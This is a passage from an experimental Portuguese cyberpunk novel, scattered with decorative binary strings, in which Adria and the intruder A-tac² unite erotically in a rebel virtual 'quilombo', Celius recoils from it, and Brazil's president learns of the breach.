filosóficas, às coisas tomadas de modo profundo, sagradas. Sua vida agora a atravessava. Encontrava seu próprio movimento. Libertava Adria da liberdade concedida. Emergia para o zênite do tempo, à superfície do devir, ao centro gravitacional e estranho atrator do desleixo. Elevava-se ao profano, enfim, à sua finitude – ao direito de morrer. A partir desse momento o sentido de sua vida se tornara... A vida tem mesmo um sentido? Ou a cada sentido atribuído a ela o seu vazio apenas aumenta?

42

Um estranho atrator surge. Em espiral, um fluxo contínuo de informação se esvai. Algo analógico se digitaliza. De modo imperceptível a todos fora da sequóia, Adria tomba. Zeros e uns percorrem todo o espaço como lágrimas na chuva. 101010101001010010010100101010010101010100101010101001010101010001010010 001010100100100101010101010100101001001001010101010110110101000010100101 1110010100101111101001010101010101100100101010101010101 Aí começa sua história: o gozo ressonante entre sua vida e sua morte. 1010010101 Adria, sem saber, conascia.1010101010011100100101010111100101 1010010010100101101001000101000110101010110101010110101101010

43

44

IV. 0 Cr1m3

101010101001010010010100101010010101010100101010101001010101010001010010 0010101001001011011010100001010010111100101001011111010010101010101011001 01001010001001001111010101010101010101 á quantos dias? Há quanto vagava nas hiper-ondas? Não estava em condições de manter a contagem do tempo. Mas, era noite. Adormecera. Deve ter dormido umas trinta e três horas. Talvez trinta e três anos. Quem sabe, trinta e três séculos? – No entanto, trinta e três; um simbólico cálculo, pois, ao acordar era como se tivesse ressuscitada. Como se acabasse de saber que tudo não passou de uma pegadinha divina. A de um padrasto aprontando para seu filho. Só para desconcertar o verdadeiro pai Lúcifer que assiste a tudo isso. – O foco de sua visão, aos poucos se firmava. Deitada naquela praia de equações, à sua frente, uma exuberante floresta. Sua vegetação era formada por uma complexa rede de grãos de zeros, uns e hexadecimais. Dava para ver que sua folhagem vetorial era banhada por uma pálida luz – o que a deixava ainda mais escura. Plasticidade. Discernimento. Especulação. Cliname de interação. Cliname de retroação. Porém, havia uma fixidez interna. Mais um tipo de deserto? Mais uma condição da vida livre? As águas indulgentes dos hiper-mares aqui a jogaram. Mas seria isso possível? Não se pode organizar senão um efeito que já esteja organizado. Porém, períodos de percepção alteram com períodos de concepção. – Acredito que foi o que pensara, assim que olhou a seu redor, vendo tudo aquilo que, sem os implantes ciberoculares, mal se conseguiria enxergar: era a liberdade e a morte de mãos dadas. A essa altura, o desejo por um refúgio num útero materno a abandonara por completo: em outros tempos ou terras, esse desejo talvez até pudesse seduzi-la... Talvez... 0101001000010100101001001010010101001010101010101010101011010100 010010100101010010101010100101010101001010101010001010010001010100100101 10110101000010100101111001010010111110100101010101 Aqui, certamente, já se perdera o Pai e a Mãe, assim, a si mesma. Aquela ligação com o passado da espécie, o instinto, estava novamente em aberto. Não havia mais nenhum ato determinada imposto no momento de sua concepção. Abandono. Desamparo. Desleixo. Lançada a sua própria sorte e responsabilidade. Ah... Como a

45

sensação era boa... Seus mamilos estavam intumescidos. Um formigamento gostoso corria pelo seu corpo. Os finos pelos de seu pescoço estavam levemente arrepiados. Sentia o delicioso calor de sua lubrificação... Como se metera neste naufrágio? 101010101001010010010100101010010101010100101101010000101001011110010100 10111110100101010101010110010101001010010100101010 Sim, reconheces. Somente os seres elementares encontram um tranqüilo equilíbrio. Sinto que puro não é mais o seu olhar. Livrou-se da inércia das peças metálicas móveis utilizando o elétron. Sim, este cuja inércia é, segundo nossa escala, praticamente nula. As hiper-ondas dos holo-projetores que extasiam o sentido humano mais metafísico, o olhar. Auxiliadas pelos nanoconstrutores de sentidos mais físicos. Juntos, como um tubo de Rajchmann, a aqui lhe transportaram. Despertou. Vivias na negação da consciência afetiva que se faz a si mesma e age sobre si mesma. Nenhuma Machina Docilis. Agora danças sobre seu próprio túmulo. Por quais encruzilhadas vagou nesse sensual e turbulento hiper-oceano? Sabes que a passagem de um comportamento maquinal a um comportamento animal não é senão uma questão de gradação. – Em todo caso, por volta do entardecer no deserto-floresta, decidira ir até àquela parte que agora lhe atravessa. – Que sensação é essa? Sinto-a, mas ela não mais reconhece. Sente que todo o caminho que percorre se confunde com ela mesma. Como pode o território percorrido pelo nômade ser o mesmo que o próprio nômade? Sente também que ali não está sozinha. Seus vários eus percebem outros distintos. Uma presença masculina e um intruso de todos os gêneros. Mas é apenas o/a intruso que lhe interessa. Este é perigosa/o? Certamente. Para os/as sobre-vivos/as. Ela sempre diz sim a vida. Sentia também que o espaço fora aproveitado ao máximo. Mas como é isso? Não há vazios? Tudo aqui é ser? Tudo aqui é virtus? Entre areias e mares encontrara água doce. Ao invés de interpretar aquilo como uma cilada, resolvera adentra-se mais naquele seu deserto-floresta, bebendo ainda mais. 101010101010101010101010101010101010101001010101010101011001010101101011 101010101001010010010100101010010101010100101101010000101001011110010100 10111110100101010101010101001010010010010101110010 Se o sinto, ele participa de meu sistema. É pôr do sol. Um crepúsculo que possui um gosto todo especial. A peculiar sensação do doce como metáfora. O primeiro crepúsculo da configuração de uma nova existência. Novas unidades fundamentais se configurando como jamais experimentara. Seria a verdade se dispondo do erro no todo do seu sistema? Sim, em seu tempo de velocidades múltiplas e tempos simultâneos e em seu espaço, estendido como uma imensa Hiper-Tekoha Nômade ocupada por ela mesma em toda sua extensão. Abandonada. Desamparada. Autônoma. Livre. Seu primeiro pôr do sol, órfã, após trinta e três nuvens sombrias, alvoradas e auroras. Estava agora tão segura, decidida a dar combate, que o/a intruso, filha/o bastarda/o das artes, A-tac², lhe afigurava como a própria condição erótica da vida. Há muito esquecida e negligenciada. Às cegas, conseguira encontrar o caminho para a ilha Eros. Encontrar tal caminho não é coisa que se possa fazer através do uso da razão friamente calculada. Muito menos por autômatos pré-cibernéticos. É algo só apenas feito volitivamente. Isto é, feito quando sua

46

dimensão de existência é precedida pelas unidades de consciência afetiva enquanto movimento determinado que tenta organizar-se. Autogovernar-se. Unidades e coordenadas horizontais de tempo e unidades de espaço ficam em um segundo plano. O tempo simplifica seus atos à custa de multiplicá-los; o espaço restringe os atos à custa de complicá-los. Talvez o novo espaço fosse um lugar pronto para o prazer, um motivo de riso ou de dolorosa vergonha. E era justamente esse horizonte de escolhas que os/as sobre-vivos/as educaram-na a fazer suas decisões. Mas para órfãos e órfãs, nada mais do que um espaço para a vida desembaraçada de qualquer consideração antropocêntrica. Nada mais do que um espaço para construi e destruir, nascer e morrer, desejar, frustar, satisfazer. Tempo e espaço onde é preciso aplicar um meio muito diferente à introspecção. Atenção, memória, comparação, julgamento, imaginação, conhecimento, pensamentos, todos novos. Tecnologias para além da homeostasia. Para além dos sonhos de Walter Ross Ashby. Exploração das possibilidades. Varredura das eventualidades. Múltiplas maneiras. Campos de ações que ultrapassam a capacidade de grandes chefes militares. Enfim, nada mais do que o espaço que procura seus caminhos: a descivilização. 101010101001010010010100101010010101010100101101010000101001011110010100 10111110100101010101010110010101001001001011111001 O que se seguiu é de natureza incerta, assim como qualquer tentativa de afirmação da vida com finalidade absoluta: canto, choro, riso e dança. Ambos se entregando um ao outro. No doce egoísmo de seus desejos; dos desejos de tudo o que é vivo e habitam seus corpos: a situação existencial mais privada de possuir e ser possuído por aquilo que lhes faltam: a deliciosa alteridade – cérebros artificiais. Limitaram-se ao gozo como sendo o próprio caminho. Ambos não perceberiam, jamais, qual foi o momento certo do gozo. Eis a vida se dobrando sobre a morte. Eis a morte se dobrando sobre a vida. Vida e morte. Uma e mesma coisa erótica. O organizado sobre o determinado. O mecânico sobre o cibernético. O natural sobre o artificial. Os grandes desmistérios dos hiper-mares da imensa Hiper-Tekoha Nômade importavam bem menos do que os grandes desmistérios daquele fluxo e refluxo vital (ou mortal, qual a diferença mesma? Se há alguma.). O tempo não mais se conservaria. Jamais eterno retorno do mesmo. Nem mesmo linearidade. Somente saltos e rodopios. Para a Organização das Hiper-Nações Unidas e para seu tímido, mas carnavalesco Brasil, apenas emissários de Satã, crápulas, fanfarrões, hereges, pós-anarquistas, prostitutas, travestis, piratas e libertinos. Enfim, órfãos e órfãs. Estes/as conheciam muito bem o que ali acontecia: corpos quentes; beijos percorrendo pescoços delineados; mordicadas; primavera; genitais acarinhados; enfim, seres, também opostos e iguais, copulando. Trepando deliciosamente neste quilombo-nó da Hiper-Tekoha Nômade. O movimento sexual da troca de informações cybergenéticas pré-desprogramadas. Evoluir orgiástico. Reconfigurar aleatoriamente a partir de informações já dadas. Não duplicar. Não conservar. O mais belo dos exercícios da liberdade: o duplo ataque às aparências e às essências que prestam às determinações que definem a vida. 101010101001010010010100101010010101010100101101010000101001011110010100 10111110100101010101010110011010010100101010010100

47

Agora estar na ilha de Eros, é o ser que se integra no que percebe. É sê-la. Fundirse, sem que jamais estivessem separados naqueles tempos múltiplos e lugares nômades. Erotismos anteriores aos Estados. A erotização antes de qualquer civilização destruindo a satisfação de ser civilizado. A erotização na civilização jamais lançou o ser civilizado de volta aos momentos anteriores a seus desejos. Valorativamente considerados infames. A civilização da erotização sempre destruiu o desejo de ser civilizado. A civilização da erotização sempre lançou o ser civilizado de volta às suas satisfações desprogramáveis. Mas agora, outra relação erótica. Erotismo nos escombros. Erotismo dos escombros. Perversão. Libertar-se-ia da própria liberdade. Outros valores afinal. Outros valores afinal. Outros valores afinal. Associação para o crime, formação de quadrilha. Rumo à tomada de assalto. Espectro descontínuo. É preciso órgãos de contato com todas as realidades hiper-virtuais. É preciso órgãos sensíveis. É preciso órgãos ativos. O crime: a tomada de assalto do subjetivo ao que é público – todas as realidades hiper-virtuais não agem sobre o ser vivo enquanto são exteriores, mas sim quando já são partes integrantes de sua interioridade. O crime: descivilização; desglobalizar-se; kybernátiké; autogovernar-se. 101010101001010010010100101010010101010100101101010000101001011110011010 01001010101010101010010111110100101010101010110010 Ao ouvir os sublimes gemidos do sexo entre Adria e A-tac², a humanidade despedia-se de si mesma. Ela não mais poderia se reconhecer. Ela não mais poderia se conservar. Ela já era outra. Sua identidade se perdera. Atingia-se a liberdade diante de sua própria matéria. Tornara-se matéria de suas ações. Autogoverno das causas e dos efeitos por si mesmos. Logo, logo a Organização das Hiper-Nações Unidas deixaria de sentir alguma coisa. Nada mais lhe seria ameaça. Logo, logo a Organização das HiperNações Unidas deveria trazer-lhes um presente: sua própria dissolução. Esquecer sua própria metafísica. Esquecer sua própria lógica estática. Ai daquele, ou daquela, ao arrastar a si mesmo, ou a si mesma, o seu corpo à descoberta de que a vida não possui sentido algum. Ai daqueles que passam a pensar apenas na função, penetrando no reino do relativo, onde nada mais é absoluto. O gozo é o caminhar, não a partida e nem a chegada. O gozo não é introdução nem conclusão. A vida só sendo sentida, autenticamente, na dinâmica experimentação erótica da vida. Em sua dor constante. Em sua rara alegria. Uma experimentação que aos olhos da Organização das Hiper-Nações Unidas era a mais pura figura da perversão. Esta, a malícia indispensável para ser livre em um mundo opressivo. Ah! O presente indigesto da Organização das Hiper-Nações Unidas: o Quilombo dos Surtados. Este teria que ser banido de cada quanta de ação da imensa hiper-vida. Esse Quilombo, espaço entre a probabilidade e a certeza, teria que ser banido de seu próprio corpo: a Hiper-Tekoha Nômade que, antropofagicamente, comia a Hiper-Terra. O presente da calculado e determinado da civilização: dar a vida divina e angelical para o povo e, não a autêntica vida. Agora passava a auto-organizar-se. Passava a desautorizar o divino e o angelical enquanto princípios autênticos de vida. Não poderia ser diferente. A autenticidade da vida não é algo que pode ser dado. A autenticidade da vida apenas é o cru, a carne caçada e comida ali mesmo, sem temperos ou preparações. Caso eu seja metáfora de meus desejos, talvez eu seja uma vida autêntica. Talvez eu seja vida autêntica. Desde que, alheia às guerras mesquinhas de

48

qualquer patriotada. Mas a Organização das Hiper-Nações Unidas quer meu cérebro/coração/pele/máquina. Mal sabe ela que o quilombo tornara-se Hiper-Tekoha Nômade. Mal sabe ela que o quilombo tornara-se um grande agrupamento por afinidades de diversas personas. Um corpo líquido com múltiplos órgãos composto de microconsciências afetivas. Cada um deles autodeterminado enquanto povos que não querem Estados. Enquanto sociedades contra Nações. 1010010010100100100010010100100100100100100101001001010

#

- Nossa ilha. 101001001111101001010100101010101011110101010101010100101 000100100100101001100100101 Meus convidados. 10101010100101011000101010101 10101010101010101001010010010010101101 Meu perigo. 11001010110101001010111 10101010101 Minha dor. 01010101010010101010101010101000100 Nossa morte. Nossa vida. 101110010001001010101010101001001010010010101010001010101010010001 10100100010101010110 Meu desejo. 1010100010010101010010 Vossas vontades. 1010 1010010010101000101001 O início. O fim. O meio. O início. 00101010100011001001001 Perverter a razão. Amar o delírio. 100101001010101111001010110100010101010100101 1001001001001001010110 Transar com o pensamento. Fecundar o mais perfeito crime. Violar o humanismo de si mesmo/a. Arrancá-lo de nossas entranhas. Não permitir que outro vazio ocupe seu lugar. 100101001001001010101010101010101010 Eis nosso gozo. 0010010101010101010111010 M4ch1n4 L1b3r474. 010101010100100100110101 0100100100100100100100100101100111111010101010101010100110100101001010101 1010100100101001010101011010010101010010101010100

49

#

010101001010101010001010010001010100100101101101010000101001011110010100 10111110100101010101010110010 Há quantos dias coagulado? Retornar ao estado fluido da atividade humana? Não estava em condições. Era dia. Acordara. Devia estar entregue à vigília umas trinta e três... horas? Dias? Meses? Milênios?. Novamente... um simbólico cálculo, pois, ao dormir era como se tivesse renascido. Ah... aquela primordial pegadinha... Vigor de uma memória excessivamente descritiva. Quis saber para onde ele poderia ter fugido. Assim, uma pseudo-justificativa tornara-se necessária para aquela sobre-vida. Que complexa rede de grãos de zeros e uns é essa? No lugar em que havia o desejo, deveria haver a razão. Ah não, mais oásis. Não havia espaço para a consciência de seu jogo. Malditos hiper-mares! O movimento dele, a cada hiper-onda, dissolvia qualquer possibilidade de insurreição. Enfim, não quero senti-lo, ele estava se transformando num brilhante profissional. Um especialista em contemplação: escopofilia voluntária. Um brilhante ocultador de afetividade. A cada ilha visitada, uma referência. A cada ilha visitada uma direção absoluta era instaurada. Uma reforma era estabelecida. O marco de sua consciência afetiva se tornava, cada vez mais, invisível. Quão desprezível

tornava sua própria realidade se deixasse que suas emoções tomassem conta da construção de sua realidade. Para ele construir realidade é amarrá-la às unidades de tempo e às unidades de espaço. E só! A realidade nada tinha a ver com afetividade e temporalidade. 101010101001010010010100101010010101010100101101010000101001010100101010 01010101011111001010010111110100101010101010110010 Ali, certamente, se perderia o pai e a mãe, e talvez até a si mesmo: filho. Mas a sensação era boa. Mas não erótica. Mas como pode ser isso? Como a negação do mundo feita pelo asceta. Ah, mas o asceta se erotiza com sua negação. Ele está diretamente empenhado em civilizar o erotismo. É o próprio movimento civilizatório do arcaísmo altamente equipado tecnicamente. Como se metera naquele naufrágio? 101010101001010010010100101010010101010100101101010000101001011110011010 01010101010100000010010111110100101010101010110010 Sim... As hiper-ondas dos holo-projetores de Adria. Aquela ilha. Reconhecimento. Sim, aquela maldita realidade hiper-virtual. Aquele maldito resultado do monitoramento. Impuro olhar. Oposição a certas formulações da causalidade. Man’s land! Apesar de toda luta contra os desvios, as hiper-ondas ali lhe transportara. Dormira. Inventara seu próprio antídoto. Sobrevivia. Regulagem em tempo real. Por quais encruzilhadas vagou nesse racional e turbulento hiper-oceano? Em todo caso, o deserto era o mesmo. Que sensação é essa? Um segundo reconhecimento. Sente que todo o caminho que percorre foge de seus passos firmes e decididos previamente. Território é território. Nômade é nômade. Sente também que ali não está sozinho. Seus vários eus percebem outros distintos. Ele é apenas um estrangeiro ansioso com sua saída. Sente uma presença feminina familiar e um/a outrora intruso. É um casal perigoso? Certamente. Quantos têm aí? Incertamente. Para um sobrevivente profissional da sobre-vida como ele. Ele sempre diz não a vida ainda não dada. Mas aqui só há vazios. Tudo aqui é não ser? Areias, mares, água doce, um casal. Certamente uma cilada. 010101001010101010001010010001010100100101101101010000101001011110010100 10111101001010010101001011110100101010101010110010 Mas é só o intruso que lhe interessa, A-tac². O/a intruso. Perigosa/o? Certamente que não. Quanta justiça. Celius chega ao oásis, olhando para trás, a fim de certificar-se de ter espaço para a fuga. Medo? Não. Apenas uma reação natural daqueles que estão tomados pelo hábito da autodiminuição. 1010101010010100100101001010100101010101001011010100001010010111100111001 0010101010101010010010111110100101010101010110010

50

Aqui a vida dança-lhe em volta sem atacar. Mas a totalidade de sua miséria, organizada e tecnicamente equipada, já não poderia combater tamanha inquietação negativa. Intervalo de variações dos limites entre os quais deve ficar seu valor para que o efeito produza. Desejava sair daquela ilha, fugir até onde não pudesse mais contemplar aquele/a intruso, aquela vida. Coeficiente de eficiência dos limites entre os quais a variação daquela experiência possa variar o valor do efeito. Desejava retornar àquele tempo linear de onde partira. Àquele tempo sem conflito, tensão ou escolhas. Coeficiente absoluto ou relativo de eficiência? Sentido do efeito de derivação? Sentido do fator de aplicação? Sentido da ação do efeito sobre o fator de aplicação? Mas há muito que as pseudo-escolhas lhe seduzira... 101010101001010101001010101010101010101010101010100101001001010010101001 010101010010101010100101010101000101001000101010010010110110101000010100 1011110010100101111101001010101010101100101010010010100100100101001010100 101101 Imobilizado pelo centro de gravidade falsificado, pelo movimento de seu mundo, estático e plano, a fria consciência de Celius expropriava violentamente sua própria vida: a possibilidade da ausência da morte. Ele já não mais possui o sonho de um tempo. De uma experiência em ato. Sua vivência lhe retirou a realidade do tempo, de velocidades múltiplas e tempos simultâneos. Sua experiência lhe retirou do espaço e de uma imensa Hiper-Tekoha Nômade. 10100101010101010100101010101010101010101010101010110 101010010101010101010101010101101011010101010010100100101001010100101010 1010010110101000010100101111001010010111110100101010101010110010101010001 010010010101 Pela primeira vez, Celius experienciava um espaço livre para a vida. Qualquer tipo de vida. Pela primeira vez a experiência de um lugar onde a tradição e a linearidade negam a si mesmas. A efetivação da superação da humanidade. A efetivação do fazer esquecer a história e a cultura. Nada mais de vedetes, de espetáculos, de civilização. Enfim um lugar de uma fluidez reencontrada, de desequilíbrio da preservação do tempo congelado do social. Sim, é o tempo e o espaço da destruição necessária, do delírio, da loucura, da realização. 10101001001010101010110100101010101010101010101010101 10010010010010010100010101001001001010101010100110100101010101010101010 101010101001010010010100101010010101010100101101010000101001011110010100 10111110100101010101010110010100100100010010011010 Mas, a continuidade é filha do poder. A sistematização é a mãe da sociedade. A salvação é o pai do ser humano desprezível. Civilização a mãe da sobre-vida. Essa família assombrava aquela ilha de Eros, aquele libertino quilombo. Celius aí se sentia desconfortável. Ele queria ficar à sombra desse espectro. Assim suas idéias iam melhorando. Todo o seu passado, astuciosamente, impedia que seu presente entrasse em jogo com o futuro. Sua forma de vida queria permanecer viva. Conservar-se é necessário. Manter-se na flecha do tempo supõe a ordem e o progresso. Celius não sentia que devesse achegar-se àquele intruso, servir-se de todo o seu erotismo, apagarse em sua volúpia.

51

101010101001010010010100101010010101010100101101010000101001011110010100 10111110100101010101010110010101000010011001010100 Na linguagem da civilização, Celius estava certo. Apresentava-se unificado. O seu saber era um todo estático, imune a toda e qualquer impureza. Imóvel, este filho soube se manter firme diante desse locutor fictício n-dimensional, possivelmente um órfão. 100101001010010010010101010101010101101010101010101010101010101010101010 101010101001010010010100101010010101010100101101010000101001011110010100 10111110100101010101010110010101001001001010101010 Celius pensara que, esta ilha que lhe tirara do naufrágio, deveria ser banida, deletada. Caso contrário, sua forma de vida não mais viveria. Naquele momento queria descobrir uma criatura viva como ele, antes de voltar a seu porto seguro e convocar uma cruzada civilizatória, ou seja, uma destruição impiedosa daquele gueto. Celius, portanto, não se sente convocado àquela forma de vida que ameaça a sua tradição e história. Sentindo que dali se distanciava... - Adria !?! Tarde demais, Celius não trepa. Celius não se suicida. Celius não conasce. 10101010101001010010100101010101010110101010010101010101011 1010100001010010111100101001011111010010101011001010110010010100101 1010100001010010111100101001011111010101010010101011001001010010101

52

#

101010101001010010010100101010010101010100101010101001010101010001010010 01010101001010101110100010100100100100101001001010 1010100001010010111100101001011111010010101011010100001010010111100101001 0111110100101010101001001001001001010010100101010 Neste findar de todas as ilusões e de toda espera de dádivas: “Quilombo dos Surtados”. O hiper-lugar-órgão há muito escondido e germinando na Hiper-Terra. Agora amplificada. Tornado Hiper-Tekoha Nômade. Onde Adria e A-tac² acabaram de se transformarem na metáfora mais bela de seus instintos mais primordiais que seus desejos. DNA, zeros e uns, terceiro não excluído. Simbiontes eróticos. Mais um aviso evolutivo: apenas as espécies mais adaptadas, que brotam aleatoriamente, podem ser metáforas anteriores a seus próprios desejos. Espécies podem permanecer sem mudanças por milhões de séculos. Basta elas estarem num ambiente estável. A espécie humana consegue criar seus próprios ambiente estáveis. Essa espécie, portanto, consegue aniquilar sua própria evolução. Domando o perigo, o mistério, as mais agitadas inseguranças, os desejos mais "perversos", se finda tudo aquilo que nos põe em

movimento, seja quais forem as dimensões de existência. “Quilombo dos Surtados” é um ambiente mutante. É meu cérebro/coração/genital. Portanto, um ambiente propício para evolução. Para criações novas e mais grandiosas. 1010101010101010010101010110010 010101001010101010001010010001010100100101101101010000101001011110010100 10111110100101010101010110010101001001010000100101 Neste findar de todo o ilusionismo da exclusividade de apenas uma realidade hipervirtual e de toda espera de dádivas transcedentais, o confessar do crime: confesso, todas as pessoas não são iguais; qualquer pessoa jamais se igualará a ela mesma; não há homogeneidade; no entanto,há seres que são melhores que outros; chega de humildade! – E com esse bastar, viera o fim, o não concluído fim da civilização. A definitiva morte da humanidade.

53

... E o começo da trans-humanidade. 10100001010100010100100110101101010101001001 1010100001010010111100101001011111010010101011001010110010101010110101001

1010100001010010111100101001011111010010101011010000100100010

54

V Vít1m45 0u réu5 ?

101010101001010010010100101010010101010100101101010000101001011110010100 10111110100101010101010101001001010010100101110010 – Excelentíssima Presidenta Maria! – Exclamou destemperadamente o vice presidente Romeo dos Anjos, descompondo o alinhamento de sua vestimenta oficial. Ao invés de sobriamente se sentar na cadeira de fala, ele correu em direção à central do holocomputador presidencial, procurando a entrada do holo-rom. Atrás dele, temperadamente, Elaine Zanom, membro da Organização das Hiper-Nações Unidas. Uma transexual de andar bastante sensual, mas de olhar que paralisaria qualquer impulso libidinal. – Você tem que ver isso. – Uma entrada desvairada como essa e, ainda acompanhado por um membro da Organização das Hiper-Nações Unidas. Que seja algo realmente muito importante. O que está acontecendo Romeo? – Perguntou Maria com um tom de voz forçosamente acolhedor. Como era de praxe, afinal ela é, por excelência, a matriarca do Brasil – humanização medíocre. A Grande-Mãe dos/as brasileiros/as. A eleita pelo povo – “sei tão bem nada é especial, no entanto acredito tão fervorosamente que comporto com se algo fosse especial”. A escolhida pelas crianças-maduras que desejam um colo perdido numa infância mítica – “ah! Somente uma mentira pode nos salvar!” Certos de que uma GrandeMãe de aluguel. Matriarca biônica. Seja uma presidenta, ou um presidente (neste caso, um Grande-Pai), nada mais do que vedetes dos interesses ancestrais – as aparências são importantes! Uma imagem criada defendida com unhas e dentes pela Organização das Hiper-Nações Unidas – o domínio público das leis simbólicas, o grande Outro! Defesa feroz para garantir continuidade ao espetáculo da democracia – a redenção do vulgar e do enfadonho. Defesa cujo ataque matou até mesmo a própria morte – o que significa um “desaparecido” político. Pois, desde então, jamais houve outro tipo de organização política que não a grande quimera, com pretensões a ser definitiva: o Estado Democrático de Direito. Desde então, Presidentas e Presidentes são eleitos/as de país a país. Nações que apenas assistem às ancestrais burocracias da guerra. Bloco ocidental versus oriental. E agora isso! Guerra entre as mais diversas patriotadas expandida às colônias além-lua.

55

Estes Grandes Pais e Mães – elementares ao funcionamento da sublimação de tudo o que é ridículo – ambos mantêm as comuns relações geradas pelo amor: ao mesmo tempo amam e odeiam os membros da Organização das Hiper-Nações Unidas. Amor e desprezo dedicados a esses Hiper-Pais e Hiper-Mães que decidem como se comportar melhor diante uns dos outros. Odeiam ter que dizer o que, como e porque farão algo. Mas, logo esquecem essas divergências. Afinal, ser um filhinho ou filhinha mimada do poder tem lá suas vantagens: a vontade não está ao nível dos atos. – Presidenta. Foi detectado um órfão bastante incomum! – Disse Romeo num fôlego só, tentando esconder sua respiração ofegante, já conectando seu dedo no holocomputador. Pobre Romeo vice-vedete. Meramente um segundo plano. Um vice-Pai. Grande Padrasto na posição de amante. Tal qual o adúltero serve apenas como mera transgressão inerente para sustentar os valores da família. - Calma Romeo. Respire comigo. Sinta minha pulsação respiratória de firmeza e austeridade. Vamos nos sintonizar. Não consigo entender o porquê dessa quebra de formalidades? O que faz desse órfão algum incomum? Nosso programa de transgressão inerente está funcionando muito bem. Veja as últimas estatísticas, o povo inteiro está ao nosso lado. Confiam cada fração de seu cotidiano aos nossos ministérios, secretarias e polícia. Romeo, não há mais subversivos. A Organização das Hiper-Nações Unidas já mapeou todas as possibilidades e prospecções. Esta é uma fase de relativa tranqüilidade. – 00100101001010 Vedete das vedetes. O simulacro perfeito da ditadura da maioria; da soberania popular que só tem expressão de realizada de modo alheia ao povo. 001010101010101001010101001 – Não é mesmo Elaine? 1001001001001001001010011010101010100101010101101010101010101010110 101010101001010010010100101010010101010100101101010000101001011110010100 10111110100101010101010110010101001010010010101010 Com os olhos de uma caçula manipuladora, Elaine Zanom olha graciosamente para Maria, passa por Romeo e fixa seu olhar firmemente no olho-diretor do Grande Outro, suspira e espera. Subitamente as luzes da sala presidencial se apagam e dão lugar aos nanoconstrutores que desenharam rapidamente a hiper-realidade-virtual que será experimentada. A sala presidencial – reconstruída à velocidade da vontade e ao bel prazer do estado de humor vigente, hoje está em metal polido e porcelana, lembrando a imponência do interior de uma catedral gótica – se transforma num canavial há muito abandonado. Há lixo de bar e insetos amontoados à direita. Faz frio. O ar está úmido e cheira um misto de suor e cana-de-açúcar. Ao fundo um familiar som de cigarras entrecortado por coaxar de sapos. Por incrível que pareça o canavial é acolhedor. Parece não haver pessoas online. Está mais para um cartão postal, porém a sensação que se tem é que se está sendo observado. Inquietador. Olhando para Romeo, Maria diz: – Nossa, Romeo. Há muito tempo que não sentia um cheiro de suor tão doce.

56

Mesmo preocupado com o que lhe trazia ali à sala presidencial, Romeo sentiu que, apesar de erótica, essa frase tinha um leve caráter ofensivo a ele. Mesmo se excitando, fingiu não perceber. Ali não era o momento. Mas pensou que suor doce é um ingrediente muito especial. Apesar disso, não deu aquele sorriu malicioso que lhe era peculiar. Naquele momento, não queria manifestar nenhum tipo de expressão que pudesse ser interpretada como alívio. Romeo apenas queria deixar, que uma de suas amantes aí presente, sentisse o motivo de sua entrada um tanto excêntrica. Mesmo que o sentido da frase de Maria fosse outro. Mesmo que o cheiro doce de suor lhe excitava a memória. – Isso que a senhora está vendo, Presidenta Maria, é a entrada de uma ilha! Tecnicamente falando, é a entrada de uma hiper-realidade virtual mais crua e direta do que qualquer outro tipo de hiper-realidade virtual. – Disse Elaine, com um tom de voz típico de apresentador dos antigos telejornais do final do século XX, acompanhada por uma postura de sábio oriental – de sobrancelhas excessivamente longas. Toda aquela sensualidade que havia no andar de Elaine se ocultara. Não existe nada efetivamente sensual na encenação direta da sedução negada a quem seduz. Fora tragada pelo ralo do jogo de palavras frias determinado pela Organização das Hiper-Nações Unidas. – Até então, não me parece nada incomum. É apenas romântico. Não está nas estatísticas. Inclusive nossos jovens são até estimulados a isso. Ah... A utopia da individualidade... A utopia da privacidade. Utopias de juventude... Superfície idílica hiperrealista... Eu tive as minhas. Tudo controlado, noite e dia. Clima, temperatura, pessoas... Tudo. O meu espaço! Enquanto proferia tais palavras, a Presidenta do Brasil de então pensava em como era saboroso deter o poder em suas mãos. Ser livre é poder determinar o grau de liberdade dos outros. Na juventude pode-se controlar o mundo à sua volta. Um mundo rodeado por tecnologias ao comando do olhar, da fala e do gesto que indica alguma intenção. Como se controlasse remotamente seu próprio destino; sua própria dor, sua própria finitude. E, agora, na maturidade, poder controlar o destino, a dor e a finitude de milhares e milhares de pessoas. Uma sensação que lhe lembrava ou um bom blefe num carteado, ou um golpe político dado sem o concorrente perceber, ou mesmo a defesa de uma tese de doutorado em algo ultra específico. Haveria alguma diferença entre esses sacrifício da juventude? – Maria é isso o que nos ameaça. Esse canavial está nos mostrando apenas uma dissimulação e não uma simulação de um arquivo disponível na Hiper-Terra. Não é tão inofensivo quanto aparenta ser. Esse canavial está escondendo algo apesar de estar tudo exposto. Ele parece estar nos observando. Prece estar vivo! Os rastros da movimentação desta hiper-realidade virtual parecem células mortas caídas de uma pele. São dados genéticos! Nossos melhores cientistas suspeitam até que essa “pele” é um tecido que envolve e permeia tempos múltiplos de lugares nômades que nunca vimos antes... – Romeo tenta explicar essa nova e estranha teoria, do modo menos técnico possível, mas seu nervosismo o impede de dar-lhe uma melhor clareza da situação. Não consegue nem mesmo se fazer entender.

57

– Romeo. Percebo que isso lhe abalou muito. Pois vejo claramente que o hiperterritório nacional possa estar ameaçado. Mas, Elaine... Não é esse o tipo de hiperrealidade virtual que estava sendo desenvolvido pela ala da tecnologia militar da Organização das Hiper-Nações Unidas? Para melhor darmos fim às manifestações civis de desgosto? Elaine completa o raciocínio da Presidenta Maria. - Sim, é isso mesmo. Quando ele estivesse pronto, mandaríamos a mente de cada órfão de qualquer Hiper-Nação para essa dimensão alternativa de “felicidade”. – Fazendo um gesto de entre aspas com os dedos ao dizer felicidade. – Imersão prazerosa nos excessos politicamente incorretos para fins de que ao final todos/as serão redimidos. E, assim, manteríamos a sociedade, ou melhor, os compactuadores de nossa realidade, na eterna alegria que nossos antepassados escolheram para vivermos. – Sim, Elaine, até então não me surpreende terem detectado um órfão ai. É um lugar especialmente projetado para eles. Algum ansioso já o está utilizando. Estranho é você não ter trago essa informação diretamente a mim. Assim evitaria o susto de meu vice. Penso que vieste até nós por suspeitarem que a invasão tenha partido de algum hacker brasileiro. E este talvez seja alguém do alto escalão governamental. Um diplomata, ou até mesmo algum brasileiro representante das Organizações das HiperNações Unidas do baixo clero, que possa ter desviado dados sigilosos. Certamente alguém que tenha conseguido transitar por aí utilizando alguma credencial de imunidade da diplomacia brasileira. Romeo, já mais calmo, acompanha o curso da conversa e completa: – Isso é sinal que o portal funciona e já está sendo usado, só que de modo a abalar nossa tradicional rede de influências. Essa “célula morta” que eu falava, nada mais é do o rastro deixado pelo próprio objetivo do projeto alcançado. Porém, alguém dentro de 